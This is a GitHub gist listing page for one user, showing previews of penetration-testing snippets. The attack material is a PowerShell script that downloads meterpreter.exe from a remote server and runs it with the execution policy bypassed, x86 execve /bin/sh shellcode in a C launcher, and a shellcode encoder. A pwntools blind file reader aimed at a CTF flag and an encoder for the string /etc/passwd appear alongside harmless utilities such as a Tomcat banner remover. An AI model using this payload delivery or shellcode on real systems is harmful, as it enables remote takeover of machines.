Skip to content

Instantly share code, notes, and snippets.

View Sinkmanu's full-sized avatar
😸

Manuel Mancera Sinkmanu

😸
51 followers · 114 following
View GitHub Profile
@Sinkmanu
Sinkmanu / not-encoder.sh
Created October 12, 2017 11:20
Encode string with NOTs
$ echo -e 'import ctypes\nimport sys\nf="/etc/passwd"\nfor i in f:\n\tsys.stdout.write(hex(ctypes.c_uint8(~ord(i)).value)+",")\nsys.stdout.write("\\n")' | python
@Sinkmanu
Sinkmanu / blind-reader.py
Last active May 8, 2017 06:35
Assembly-python blind file reader. Useful when the write syscall is not allowed.
#!/usr/bin/env python
from pwn import *
import string
import time
context.log_level = 'error'
u = make_unpacker(64, endian='little', sign='unsigned')
filename = hex(u('.///flag'))
@Sinkmanu
Sinkmanu / Add2XornNot.asm
Last active February 9, 2017 21:53
Shellcode encoded with add 2, xor and not
; /bin/sh execv encoded with XOR and SUB
global _start
section .text
_start:
jmp short call_decoder
decoder:
@Sinkmanu
Sinkmanu / reverse.py
Created January 30, 2017 21:54
Reverse string command (string to reverse hex)
python -c "cad = '//bin/bash'; print [cad[::-1].encode('hex')[i:i+8] for i in range(0, len(cad[::-1].encode('hex')), 8)]"
@Sinkmanu
Sinkmanu / skeleton.c
Created January 25, 2017 17:14
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
"\x80";
int main() {
@Sinkmanu
Sinkmanu / removeTomcatBanner.sh
Created October 31, 2016 09:32
Remove the Tomcat banner
#!/bin/bash
CATALINAJARPATH=/path/to/catalina
cd $CATALINAJARPATH
echo "Removing banner..."
jar xf catalina.jar org/apache/catalina/util/ServerInfo.properties
sed -i -e 's/Apache Tomcat.*/Apache Tomcat/g' org/apache/catalina/util/ServerInfo.properties
sed -i -e 's/[[:digit:]].*\.[[:digit:]].*\.[[:digit:]].*\.[[:digit:]].*/0\.0\.0\.0/g' org/apache/catalina/util/ServerInfo.properties
sed -i -e 's/server\.built=.*/server\.built\=/g' org/apache/catalina/util/ServerInfo.properties
cat org/apache/catalina/util/ServerInfo.properties
@Sinkmanu
Sinkmanu / commands.txt
Created September 15, 2016 13:43
Useful commands
# Get all opcodes of a binary file
for i in `objdump -d program | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
@Sinkmanu
Sinkmanu / findnmapscripts
Created July 22, 2016 07:44
Script to find nmap scripts by name
#!/bin/bash
# vim /usr/bin/findnmapscripts
# chmod +x /usr/bin/findnmapscripts
# findnmapscripts http
find /usr/share/nmap/scripts/ -name "*$1*" | cut -d "/" -f 6
@Sinkmanu
Sinkmanu / iHaveBeenPwned.py
Created June 30, 2016 09:16
Check if a list with email accounts is in HaveIBeenPwned
#!/usr/bin/env python3
import sys
import requests
import json
emails = sys.argv[1]
urlAPI = "https://haveibeenpwned.com/api/v2/breachedaccount/"
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' }
@Sinkmanu
Sinkmanu / wget.ps1
Created June 26, 2016 16:47
Download file via HTTP with Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://server/meterpreter.exe" >>wget.ps1
echo $file = "meterpreter.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
And run:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1